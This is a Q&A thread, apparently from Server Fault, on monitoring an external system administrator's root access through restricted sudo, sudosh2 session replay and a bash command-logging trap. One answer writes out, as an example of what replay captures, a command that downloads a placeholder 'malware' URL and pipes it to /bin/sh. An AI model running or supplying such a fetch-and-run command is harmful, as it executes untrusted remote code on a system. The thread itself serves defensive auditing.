16

I want to give access to my root server to an external system administrator, but i want to be sure to double check what he is doing to my server, e.g. copying data i don't want them to do and so on. I would also like to take a track of whatever file is accessed, even in read only and not edited.

How can i do that?

cedivad
  • 690
  • 3
  • 13
  • 25

3 Answers3

22

Don't give him root access. Instead, give him an un-privileged user account and request that he do all of his work through sudo, which will log all of his commands.

Keep in mind that if this person has ill intentions and you give him full sudo privileges, he will find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.

EEAA
  • 109,363
  • 18
  • 175
  • 245
  • i want to make it as hard as possible without making my life a pain. Thanks for the answer. – cedivad Apr 10 '12 at 22:35
  • You can just run `sudo su -` and have a root shell that won't be logged (except that you started it). This is what I normally type when I want to do more than a single command as root in one go, or if I want tab completion in directories normal users can't read. – rjmunro Apr 11 '12 at 23:53
  • @rjmunro - Which is exactly why I issued the caveat of only giving him the specific access he needs. You can explicitly forbid `sudo su -` if desired. – EEAA Apr 12 '12 at 00:22
21

Trust, but verify!

Check out sudosh2. sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:

sudosh is an auditing shell filter and can be used as a login shell. Sudosh records all keystrokes and output and can play back the session as just like a VCR.

Sudosh will allow you to replay the user's session, which will allow you to see all input and output as the user saw it. You see everything, keystrokes, typos, backspaces, what did they edit in vi, the output of wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh, etc.

It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.

Note that sudosh2 is a replacement for sudosh, which was abandoned by it's author

Do you work at an academic institution where users insist on having superuser privledges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.

Stefan Lasiewski
  • 23,667
  • 41
  • 132
  • 186
1

I'm not familiar with sudosh2, but I put the following in my .bashrc to log all the commands I type in a bash shell to the file ~/.command_log:

# log every command typed and when
if [ -n "${BASH_VERSION}" ]; then
    trap "caller >/dev/null || \
printf '%s\\n' \"\$(date '+%Y-%m-%dT%H:%M:%S%z')\
 \$(tty) \${BASH_COMMAND}\" 2>/dev/null >>~/.command_log" DEBUG
fi

The above sets a trap on DEBUG, which is executed just before an ordinary command is executed. The caller built-in is used to test whether the command is being typed at an interactive shell or run via something like .bashrc. The value ${BASH_COMMAND} contains the command currently being executed.

Richard Hansen
  • 3,870
  • 1
  • 19
  • 17